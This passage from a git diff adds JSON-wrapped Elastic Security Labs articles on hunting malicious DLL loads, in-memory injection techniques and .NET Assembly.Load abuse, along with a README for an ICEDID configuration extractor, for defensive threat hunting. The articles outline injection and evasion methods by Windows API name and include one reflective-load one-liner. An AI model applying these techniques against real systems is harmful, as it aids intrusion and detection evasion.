SMB](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/lateral_movement_imageload_of_a_file_dropped_via_smb.toml)\n- [RunDLL32/Regsvr32 Loads Dropped Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_rundll32_regsvr32_loads_dropped_executable.toml)\n- 
[Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)\n- [RunDLL32/Regsvr32 Loads a DLL Downloaded via BITS](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_regsvr32_loads_a_dll_downloaded_via_bits.toml)\n- [Potential Initial Access via DLL Search Order Hijacking](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_initial_access_via_dll_search_order_hijacking.toml)\n- [Suspicious Control Panel DLL Loaded by Explorer](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_control_panel_dll_loaded_by_explorer.toml)\n- [Protected Process Light Bypass via DLL Tampering](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_protected_process_light_bypass_via_dll_tampering.toml)\n- [Potential Privilege Escalation via DLL Redirection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_dll_redirection.toml)\n- [Potential Privilege Escalation via Missing DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_missing_dll.toml)\n- [Potential Privilege Escalation via Elevated IFileOperation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_elevated_ifileoperation.toml)\n- [Suspicious DLL Loaded by Svchost](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_service_dll_unsigned.toml)\n- [Suspicious DLL Loaded from a Removable Media](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_dll_loaded_from_a_removable_media.toml)\n- [Suspicious 
Control Panel DLL Loaded by Explorer](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_control_panel_dll_loaded_by_explorer.toml)\n- [Dynwrapx Image Load via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_dynwrapx_image_load_via_windows_scripts.toml)\n- [Suspicious Image Load via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_image_load_via_windows_scripts.toml)\n- [Potential Image Load with a Spoofed Creation Time](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_image_load_with_a_spoofed_creation_time.toml)\n\n## Conclusion\n\nCompared to detections that rely on process execution events and where adversaries expose more detection opportunities via command-line flags and parent process relationships, designing detections based on DLL events requires more enrichment and correlation to decrease noise rate and increase confidence.\n\nIn this publication we shared numerous examples of how we’re using DLL events to identify threats. You can use the different capabilities Elastic endpoint offers to produce higher signal alerts, too. Given the multitude of methods of delivering malicious code as DLLs, though, relying on behavioral detections alone is not enough. Combining this logic with malware file classification, shellcode detection features, and user-entity based analytics (UEBA) improves the fidelity of this metadata for detection purposes.\n"
+ },
+ "title": "Hunting for Suspicious Windows Libraries for Execution and Defense Evasion",
+ "slug": "Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion",
+ "date": "2023-03-01",
+ "description": "Learn more about discovering threats by hunting through DLL load events, one way to reveal the presence of known and unknown malware in noisy process event data.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "blog-thumb-roman-columns.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detection engineering",
+ "threat hunting",
+ "threat detection"
+ ]
+ },
+ "id": "security_labs_content-hunting_for_suspicious_windows_libraries_for_execution_and_evasion-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory-md.json
new file mode 100644
index 00000000000..fa1932204c7
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Hunting In Memory\"\nslug: \"hunting-memory\"\ndate: \"2022-06-21\"\ndescription: \"Threat Hunters are charged with the difficult task of sifting through vast sources of diverse data to pinpoint adversarial activity at any stage in the attack.\"\nauthor:\n - slug: joe-desimone\nimage: \"blog-thumb-generic-black.jpg\"\ncategory:\n - slug: security-research\n---\n\nThreat Hunters are charged with the difficult task of sifting through vast sources of diverse data to pinpoint adversarial activity at any stage in the attack lifecycle. To be successful, hunters must continually hone their subject matter expertise on the latest attacker techniques and detection methods. Memory resident malware, which presents itself in many forms, is an attacker technique that has existed for over a decade. The popularity of memory resident malware has steadily [increased](https://www.cyber.nj.gov/threat-analysis/fileless-evasive-intrusion-tactics-pose-challenge-for-network-defense) over time, possibly resulting from the proliferation of code and knowledge of in memory techniques. More likely, its popularity reflects the success of memory-based techniques to evade detection by security products and practitioners. Once limited to advanced adversaries, memory resident techniques are now commonplace for all levels of adversary sophistication. I will examine the most common of these memory based attacker techniques, and walk through our team’s research to craft a scalable, low noise approach to hunting for adversaries that are hiding in memory.\n\n## Attacker Techniques\n\nBefore I address memory hunting methods to detect adversaries in your network, it is helpful to understand the common forms of memory resident malware. 
These techniques include shellcode injection, reflective DLL injection, memory module, process and module hollowing, and Gargoyle (ROP/APC).\n\n### SHELLCODE INJECTION\n\nShellcode injection is the most basic in-memory technique and has also been around the longest. The basic ‘recipe’ for shellcode injection is a four-step process. These steps are: 1) open a target process (OpenProcess); 2) allocate a chunk of memory in the process (VirtualAllocEx); 3) write the shellcode payload to the newly allocated section (WriteProcessMemory); and 4) create a new thread in the remote process to execute the shellcode (CreateRemoteThread). The venerable [Poison Ivy](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf) malware uses this technique, which is a big reason why so many APT groups were drawn to it over the years.\n\nIf you pull up a Poison Ivy [sample](https://www.virustotal.com/en/file/e0a8e823b446764e2b536e81d3fefaa9a562dd8c0614b3bdb345233de27e216a/analysis/) with x64dbg and set a breakpoint on VirtualAllocEx, you will soon locate the chunk of code responsible for the injection.\n\n\n\n\n\nIn the first image, the push 40 instruction preceding the call to VirtualAllocEx corresponds to a page access protection value of PAGE_EXECUTE_READWRITE. In the following screenshot from [ProcessHacker](http://processhacker.sourceforge.net/) of the memory layout of a Poison Ivy implant, you can see it allocates a number of these RWX sections.\n\n\n\nTypical code sections are of type ‘Image’ and map to a file on disk. However, these are type ‘Private’ and do not map to a file on disk. They are therefore referred to as unbacked executable sections or floating code. Threads starting from these types of memory regions are anomalous and a good indicator of malicious activity. ProcessHacker can also show you the call stack of the malware threads. 
There are multiple functions in the call stack which do not map to memory associated with loaded modules.\n\n\n\n### REFLECTIVE DLL INJECTION\n\nReflective DLL injection, originally developed by [Stephen Fewer](https://github.com/stephenfewer/ReflectiveDLLInjection), is another type of in-memory attacker technique. Metasploit’s [Meterpreter](https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter) payload was one of the first attempts to fully weaponize the technique, but many malware families use it today. Reflective DLL injection works by creating a DLL that maps itself into memory when executed, instead of relying on the Windows loader. The injection process is identical to shellcode injection, except the shellcode is replaced with a self-mapping DLL. The self-mapping component added to the DLL is responsible for resolving import addresses, fixing relocations, and calling the DllMain function. Attackers benefit from the ability to code in higher level languages like C/C++ instead of assembly.\n\nClassic reflective DLL injection, such as that used by Meterpreter, is easy for hunters to find. It leaves large RWX memory sections in the process, even when the Meterpreter session is closed. The start of these unbacked executable memory sections contains the full MZ/PE header, as shown in the images below. However, keep in mind that other reflective DLL implementations could wipe the headers and fix the memory leak.\n\n\n\n\n\nThe DLLs loaded in memory also conveniently export a self-describing function called ReflectiveLoader().\n\n### MEMORY MODULE\n\n[Memory module](https://github.com/fancycode/MemoryModule) is another memory resident attacker technique. It is similar to Reflective DLL injection except the injector or loader is responsible for mapping the target DLL into memory instead of the DLL mapping itself. 
Essentially, the memory module loader re-implements the LoadLibrary function, but it works on a buffer in memory instead of a file on disk. The original implementation was designed for mapping in the current process, but updated techniques can map the module into [remote processes](https://github.com/DarthTon/Blackbone). Most implementations respect the section permissions of the target DLL and avoid the noisy RWX approach.\n\n[NetTraveler](https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests) is one malware family that uses a memory module style technique. When NetTraveler starts, it unpacks the core functionality and maps it into memory. The page permissions more closely resemble those of a legitimate DLL; however, the memory regions are still private as opposed to image.\n\n\n\nThe active threads have start addresses at these private regions. The call stack also reveals these malicious sections.\n\n\n\n[Winnti](https://hitcon.org/2016/pacific/0composition/pdf/1201/1201%20R2%201610%20winnti%20polymorphism.pdf) is yet another malware sample that uses the Memory Module technique. Its authors had a minor slip on the section permissions of the first page, as you can see below.\n\n\n\nHowever, the Winnti sample was notable because the MZ/PE headers in the DLL were erased, making it more difficult to detect.\n\n\n\n### PROCESS HOLLOWING\n\nProcess hollowing is another technique attackers use to prevent their malware from being detected by security products and hunters. It involves creating a suspended process, unmapping (hollowing) the original executable from the process, allocating and writing a new payload to the process, redirecting the execution of the original thread to the new payload with SetThreadContext, and finally calling ResumeThread to complete. More stealthy variants use Create/Map section APIs to avoid WriteProcessMemory. 
Others modify the entry point with a jump instead of using SetThreadContext.\n\n[DarkComet](https://journeyintoir.blogspot.com/2015/02/process-hollowing-meets-cuckoo-sandbox.html) is one of many malware families that use process hollowing techniques. Several artifacts can be used to detect process hollowing. One dead giveaway for this activity is a process being spawned with the CREATE_SUSPENDED flag, as shown in the following screenshot from a DarkComet sample.\n\n\n\n### MODULE OVERWRITING\n\nSo far, all techniques discussed have led to the execution of non-image backed code, and were therefore fairly straightforward to detect. Module overwriting, on the other hand, avoids this requirement, making it much more difficult to detect. This technique consists of mapping an unused module into a target process and then overwriting the module with its own payload. Flame was the first widely publicized malware family to use this technique. More recently, Careto and Odinaff malware families have used module overwriting techniques. Various techniques can be used to reliably detect module overwriting, which involves comparing memory to associated data on disk.\n\n### GARGOYLE\n\n[Gargoyle](https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html) is a proof of concept technique for memory resident malware that can evade detection from many security products. It accomplishes this feat by laying dormant with read-only page protections. It then periodically wakes up, using an asynchronous procedure call, and executes a ROP chain to mark its payload as executable before jumping to it. After the payload finishes executing, Gargoyle again masks its page permissions and goes back to sleep. 
One way to detect this attacker technique is to examine threads and user APCs for evidence of ROP chains.\n\n## Detecting In-Memory Attacks\n\nGiven the proliferation and accessibility of these techniques, security personnel must be vigilant for memory-based attacker techniques and proactively hunt for them on their networks. However, most products cannot generically detect in-memory attacks at scale, leaving defenders with an enormous gap in their ability to protect against these attacks. Endgame has done significant research to bring low-noise detection capabilities into our product for each method mentioned above.\n\nGiven the immense size and impact of this detection gap, it is important to raise all boats, not just those of our customers. For this reason, we collaborated with Jared Atkinson on his PowerShell tool called [Get-InjectedThreads](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2), which implements a relatively low-noise method of detecting in-memory threats. It scans active threads on the system for suspicious start addresses. Hunters leverage it to scan hosts in their networks and quickly identify many memory resident malware techniques. The script works by querying each active thread with the NtQueryInformationThread function to retrieve its start address. The start address is then queried with the VirtualQueryEx function to determine the associated section properties. If the memory region where the thread started is unbacked and executable (i.e. not image type and has the execute bit set), then the thread is considered injected. The following screenshot shows a sample detection when run on a system infected with a 9002 RAT [sample](https://www.virustotal.com/en/file/49ac6a6c5449396b98a89709b0ad21d078af783ec8f1cd32c1c8b5ae71bec129/analysis/).\n\n\n\nThe script will catch a variety of malware families leveraging the shellcode injection, reflective DLL, memory module, and some process hollowing techniques. 
However, it is no replacement for security products that comprehensively prevent in-memory attacks, such as Endgame.\n\n## Enterprise In-Memory Detection at Scale\n\nEndgame has built detections for each of these techniques (and many more) into our enterprise security platform, offering best-in-market capabilities to locate in-memory threats. We do not simply rely on naïve approaches like monitoring well-known system call sequences for process injection, but efficiently analyze memory to find all known evasion capabilities. This provides our users with thread-level visibility on injected code, as well as sophisticated follow-on actions like examining the injected code and suspending only a malicious injected thread to remediate the threat. Our platform is effective both at stopping injection as it happens in real time and at locating already-resident adversaries hiding in memory, finding threats across tens of thousands of hosts in seconds.\n\nLike any signatureless detection technique, false positives (FPs) are an important consideration. As we researched and implemented our technique-based preventions for each adversary technique described above, we initially encountered FPs at every step of the way. Handling these correctly in our product is of paramount importance.\n\nMost FPs are related to security software, Just-In-Time (JIT) compiled code, or DRM protected/packed applications. Security products sometimes inject code into some or all processes on the system to enhance their behavioral detection capabilities. The downside is that if the product is sloppy in its methods, it can actually [harm](https://www.blackhat.com/docs/us-16/materials/us-16-Yavo-Captain-Hook-Pirating-AVs-To-Bypass-Exploit-Mitigations.pdf) the security of the system and make hunting for real in-memory threats more difficult. JIT code, another potential area for false positives, generates assembly code at runtime which lives in unbacked or floating memory regions. 
.NET or Java applications are a couple of examples which use JIT techniques. Fortunately, this type of code is easier to identify and filter than rogue security products. Lastly, applications packed or protected with Digital Rights Management (DRM) schemes should be kept in mind. These applications may decrypt or deobfuscate their core functionality in memory to deter debugging and reverse engineering. However, the same techniques are used by malware to evade detection and deter analysis from security practitioners.\n\nThrough careful design decisions and extensive testing, we have managed to achieve very low false positive rates, allowing Endgame users to root out in-memory threats rapidly.\n\n## Conclusion\n\nAdversaries will continue to innovate new techniques to avoid detection and accomplish their objectives. Memory resident techniques are no exception, and have been a thorn in the side of endpoint security defenders for over a decade. Fortunately, by understanding the latest techniques, we can turn the tables and use this knowledge to develop new high fidelity detection methods. At Endgame, our comprehensive approach to these attacks has led us to a market-leading position for fileless attack detection (adding to our other key technologies). For more on hunting for in-memory attacks, check out our [slides](https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory) from our SANS Threat Hunting and IR Summit presentation.\n"
+ },
+ "title": "Hunting In Memory",
+ "slug": "hunting-memory",
+ "date": "2022-06-21",
+ "description": "Threat Hunters are charged with the difficult task of sifting through vast sources of diverse data to pinpoint adversarial activity at any stage in the attack.",
+ "author": [
+ {
+ "slug": "joe-desimone"
+ }
+ ],
+ "image": "blog-thumb-generic-black.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_memory-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory_net_attacks-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory_net_attacks-md.json
new file mode 100644
index 00000000000..957a19363f4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_memory_net_attacks-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Hunting For In-Memory .NET Attacks\"\nslug: \"hunting-memory-net-attacks\"\ndate: \"2022-06-21\"\ndescription: \"As a follow up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection\"\nauthor:\n - slug: joe-desimone\nimage: \"photo-edited-04@2x.jpg\"\ncategory:\n - slug: security-research\n---\n\n\n\nIn past blog posts, we shared our [approach](https://www.endgame.com/blog/technical-blog/hunting-memory) to hunting for traditional in-memory attacks along with in-depth [analysis](https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) of many injection techniques. As a follow up to my DerbyCon [presentation](https://www.endgame.com/resource/video/derbycon-talk-hunting-memory-resident-malware), this post will investigate an emerging [trend](https://securelist.com/the-rise-of-net-and-powershell-malware/72417/) of adversaries using .NET-based in-memory techniques to evade detection. I’ll discuss both eventing (real-time) and on-demand based detection strategies of these .NET techniques. At Endgame, we understand that these differing approaches to detection and prevention are complementary, and together result in the most robust defense against in-memory attacks.\n\n## The .NET Allure\n\nUsing .NET in-memory techniques, or even standard .NET applications, is attractive to adversaries for several reasons. First and foremost, the [.NET framework](https://en.wikipedia.org/wiki/.NET_Framework) comes [pre-installed](https://blogs.msdn.microsoft.com/astebner/2007/03/14/mailbag-what-version-of-the-net-framework-is-included-in-what-version-of-the-os/) in all Windows versions. This is important as it enables the attackers’ malware to have maximum compatibility across victims. Next, the .NET PE metadata format itself is fairly [complicated](http://www.ntcore.com/files/dotnetformat.htm). 
Due to resource constraints, many endpoint security vendors have limited insight into the managed (.NET) structures of these applications beyond what is shared with vanilla, unmanaged (not .NET) applications. In other words, most AVs and security products don’t defend well against malicious .NET code and adversaries know it. Finally, the .NET framework has built-in functionality to dynamically load memory-only modules through the [Assembly.Load(byte[])]() function (and its various overloads). This function allows attackers to easily craft crypters/loaders, keep their payloads off disk, and even bypass application whitelisting solutions like [Device Guard](https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies). This post focuses on the Assembly.Load function due to the robust set of attacker capabilities it supports.\n\n## .NET Attacker Techniques\n\nAdversaries leveraging .NET in-memory techniques is not completely new. However, in the last six months, there has been a noticeable uptick in tradecraft, which I’ll briefly discuss to illustrate the danger. For instance, in 2014, DEEP PANDA, a threat group suspected of operating out of China, was [observed](https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/) using the multi-stage MadHatter implant which is written in .NET. More interestingly, this implant exists only in memory after a multi-stage Assembly.Load bootstrapping process that begins with PowerShell. PowerShell can directly call .NET methods, with the Assembly.Load function being no exception. It is as easy as calling [System.Reflection.Assembly]::Load($bin). More recently, the [OilRig](https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/) APT Group used a packed .NET malware sample known as ISMInjector to evade signature-based detection. 
During the unpacking routine, the sample uses the Assembly.Load function to access the embedded next stage malware known as [ISMAgent](https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/).\n\nA third example, more familiar to red teams, is [ReflectivePick](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerPick/ReflectivePick/ReflectivePick.cpp) by [Justin Warner](https://twitter.com/sixdub) and [Lee Christensen](https://twitter.com/tifkin_). ReflectivePick allows PowerShell Empire to inject and bootstrap PowerShell into any running process. It leverages the Assembly.Load() method to load their PowerShell runner DLL without dropping it to disk. The image below shows the relevant source code of their tool.\n\n\n\nIt is important to point out that Assembly.Load, being a core function of the .NET framework, is often used in legitimate programs. This includes built-in Microsoft applications, which has led to an interesting string of defense evasion and application whitelisting bypasses. For example, [Matt Graeber](https://twitter.com/mattifestation) discovered a Device Guard bypass that targets a race condition to hijack legitimate calls to Assembly.Load, allowing an attacker to execute any unsigned .NET code on a Device Guard protected host. Because of the difficulty in fixing such a technique, Microsoft currently has decided not to service this issue, leaving attackers a convenient “forever-day exploit” against hosts that are hardened with application whitelisting.\n\n[Casey Smith](https://twitter.com/subTee) also has published a ton of research bypassing application whitelisting solutions. A number of these techniques, at their core, target signed Microsoft applications that call the Assembly.Load method with attacker-supplied code. 
One example is MSBuild, which comes pre-installed on Windows and allows attackers to execute unsigned .NET code inside a legitimate and signed Microsoft process. These techniques are not JUST useful to attackers who are targeting application whitelisting protected environments. Since they allow attacker code to be loaded into legitimate signed processes in an unconventional manner, most anti-virus and EDR products are blind to the attacker activity and can be bypassed.\n\nFinally, [James Forshaw](https://twitter.com/tiraniddo) developed the [DotNetToJScript](https://github.com/tyranid/DotNetToJScript) technique. At its heart, this technique leverages the BinaryFormatter deserialization method to load a .NET application using only JScript. Interestingly enough, the technique under the hood will make a call to the Assembly.Load method. DotNetToJScript opened the door for many new clever techniques for executing unsigned .NET code in a stealthy manner. For example, James [demonstrated](https://bugs.chromium.org/p/project-zero/issues/detail?id=1081) how to combine DotNetToJScript with [COM hijacking](https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com) and Casey’s squiblydoo technique to inject code into [protected processes](http://www.alex-ionescu.com/?p=97). In another example, Casey weaponized DotNetToJScript in universal.js to execute arbitrary shellcode or PowerShell commands.\n\nThe number of Microsoft-signed applications that can be abused to execute attacker code in a stealthy manner is dizzying. Fortunately, the community has been quick to document and track them publicly in a number of places. 
One good reference is [Oddvar Moe’s](https://twitter.com/Oddvarmoe) [UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList), and another is Microsoft’s own [reference](https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-code-integrity-policies-steps).\n\n## Detecting .NET Attacks\n\nAs these examples illustrate, attackers are leveraging .NET in various ways to defeat and evade endpoint detection. Now, let’s explore two approaches to detecting these attacks: on-demand and real-time-based techniques.\n\n### On-demand detection\n\nOn-demand detection leverages snapshot-in-time data collection. You don’t need a persistent agent running and collecting data when the attack takes place, but you do need the malicious code running during the hunt/collection time. The trick is to focus on high-value data that can capture actor-agnostic techniques, and has a high signal-to-noise ratio. One example is the [Get-InjectedThread](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2) script for detecting traditional unmanaged in-memory injection techniques. To demonstrate detecting .NET malware usage of the Assembly.Load function, I leverage PowerShell Empire by [Will Schroeder](https://twitter.com/harmj0y) and others. Empire allows you to inject an agent into any process by remotely bootstrapping PowerShell. As you see below, after injection, calc.exe has loaded the PowerShell core library System.Management.Automation.ni.dll.\n\n\n\nThis fact alone can be interesting, but a surprisingly large number of legitimate applications load PowerShell. Combining this with process network activity and looking for outliers across all your data may give you better mileage. Upon deeper inspection, we see something even more interesting. As shown below, memory section 0x2710000 contains a full .NET module (PE header present). The characteristics of the memory region are a bit unusual. 
The type is MEM_MAPPED, although there is no associated file mapping object (note the “Use” field is empty in ProcessHacker). Lastly, the region has a protection of PAGE_READWRITE, which surprisingly is not executable. These memory characteristics are a [side effect](https://github.com/dotnet/coreclr/blob/3452efb58d2f3be867080f8627417b264fcbd73c/src/vm/peimagelayout.cpp#L259) of loading a memory-only module with the Assembly.Load(byte[]) method.\n\n\n\nTo automate this type of hunt, I wrote a PowerShell function called [Get-ClrReflection](https://gist.github.com/dezhub/2875fa6dc78083cedeab10abc551cb58), which looks for this combination of memory characteristics and will save any hits for further analysis. Below is sample output after running it against a workstation that was infected with Empire.\n\n\n\nOnce again, you will see hits for legitimate applications that leverage the Assembly.Load function. One common false positive is for XmlSerializer-generated assemblies. Standard hunt practices apply. Bucket your hits by process name or, better yet, with a fuzzy hash match. For example, ClrGuard (details next) will give you a TypeRef hash with the “-f” switch. Below is an example from Empire.\n\n\n\n### Eventing-based detection\n\nEventing-based detection is great because you don’t need the luck of an adversary being active while you are hunting. It also gives you an opportunity to prevent attacker techniques in real time. To provide signals into the CLR on which .NET runs, we developed and released [ClrGuard](https://github.com/endgameinc/ClrGuard). ClrGuard will hook into all .NET processes on the system. From there, it performs an in-line hook of the native LoadImage() function. This is what Assembly.Load() calls under the CLR hood. When events are observed, they are sent over a named pipe to a monitoring process for further introspection and a mitigation decision. 
For example, Empire’s psinject function can be immediately detected and blocked in real time, as shown in the image below.\n\n\n\nIn a similar manner, OilRig’s ISMInjector can be quickly detected and blocked.\n\n\n\nAnother example below shows ClrGuard in action against Casey Smith’s universal.js tool.\n\n\n\nWhile we don’t recommend you run ClrGuard across your enterprise (it is proof-of-concept grade), we hope it spurs community discussion and innovation against these types of .NET attacks. These sorts of defensive techniques power protection across the Endgame product, and an enterprise-grade ClrGuard-like feature will be coming soon.\n\n## Conclusion\n\nIt is important to thank those doing great offensive security research who are willing to publish their capabilities and tradecraft for the greater good of the community. The recent advancements in .NET in-memory attacks have shown that it is time for defenders to up their game and go toe-to-toe with the more advanced red teams and adversaries. We hope that ClrGuard and Get-ClrReflection help balance the stakes. These tools can increase a defender’s optics into .NET malware activities and raise visibility into this latest evolution of attacker techniques.\n"
+ },
+ "title": "Hunting For In-Memory .NET Attacks",
+ "slug": "hunting-memory-net-attacks",
+ "date": "2022-06-21",
+ "description": "As a follow up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection",
+ "author": [
+ {
+ "slug": "joe-desimone"
+ }
+ ],
+ "image": "photo-edited-04@2x.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_memory_net_attacks-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedid_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedid_configuration_extractor-md.json
new file mode 100644
index 00000000000..b72a4569614
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedid_configuration_extractor-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"ICEDID Configuration Extractor\"\nslug: \"icedid-configuration-extractor\"\ndate: \"2022-12-06\"\nsubtitle: \"Configuration extraction tool for ICEDID malware.\"\ndescription: \"Python script to extract the configuration from ICEDID samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - icedid\n - ref1021\n---\n\nPython script to extract the configuration from ICEDID samples.\n\n[Download icedid-configuration-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt95ce19ae8cffda29/6351abcf20f42038fb989fae/icedid-config-extractor.tar.gz)\n\n> For information on the ICEDID malware and network infrastructure, check out the following resources:\n>\n> - [ICEDIDs network infrastructure is alive and well](https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well)\n> - [ICEDID network infrastructure checking utility](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz)\n\n## Getting started\n\n### Docker\n\nThe recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.\n\n```\ndocker build . -t icedid_loader_config_extractor\n```\n\nThen we run the container with the -v flag to map a host directory to the Docker container directory.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data icedid_loader_config_extractor:latest --help\n```\n\n### Running it locally\n\nAs mentioned above, Docker is the recommended approach to running this project; however, you can also run it locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. 
This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nicedid_loader_config_extractor --help\n```\n\n## Usage\n\nAll samples need to be unpacked prior to extraction attempts.\n\nWe can either specify a single sample with the **-f** option or a directory of samples with the **-d** option.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data icedid_loader_config_extractor:latest -d \"C:\\tmp\\samples\"\n```\n\n\n\nYou can collect the extracted configurations from the directory you set when running the extractor.\n"
+ },
+ "title": "ICEDID Configuration Extractor",
+ "slug": "icedid-configuration-extractor",
+ "subtitle": "Configuration extraction tool for ICEDID malware.",
+ "date": "2022-12-06",
+ "description": "Python script to extract the configuration from ICEDID samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "icedid",
+ "ref1021"
+ ]
+ },
+ "id": "security_labs_content-icedid_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedids_network_infrastructure_is_alive_and_well-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedids_network_infrastructure_is_alive_and_well-md.json
new file mode 100644
index 00000000000..7a39f9bded1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-icedids_network_infrastructure_is_alive_and_well-md.json
@@ -0,0 +1,39 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"ICEDIDs network infrastructure is alive and well\"\nslug: \"icedids-network-infrastructure-is-alive-and-well\"\ndate: \"2022-10-31\"\ndescription: \"Elastic Security Labs details the use of open source data collection and the Elastic Stack to analyze the ICEDID botnet C2 infrastructure.\"\nauthor:\n - slug: daniel-stepanic\n - slug: seth-goodwin\n - slug: derek-ditch\n - slug: andrew-pease\nimage: \"blog-banner-network-graph-dots.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - malware\n - icedid\n - ref1021\n - bokbot\n---\n\n## Key takeaways\n\n- ICEDID is a full-featured trojan that uses TLS certificate pinning to validate C2 infrastructure.\n- While the trojan has been tracked for several years, it continues to operate relatively unimpeded.\n- A combination of open source collection tools can be used to track the C2 infrastructure.\n\n> For information on the ICEDID configuration extractor and C2 infrastructure validator, check out our posts detailing this:\n>\n> - [ICEDID configuration extractor](https://www.elastic.co/security-labs/icedid-configuration-extractor)\n> - [ICEDID network infrastructure checking utility](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz)\n\n## Preamble\n\n[ICEDID](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid), also known as Bokbot, is a modular banking trojan that was first discovered in 2017 and has remained active over the last several years. More recently, it has been known for its ability to load secondary payloads such as post-compromise frameworks like Cobalt Strike, and has been [linked](https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html) to ransomware activity.\n\nICEDID is implemented through a multistage process with different components. 
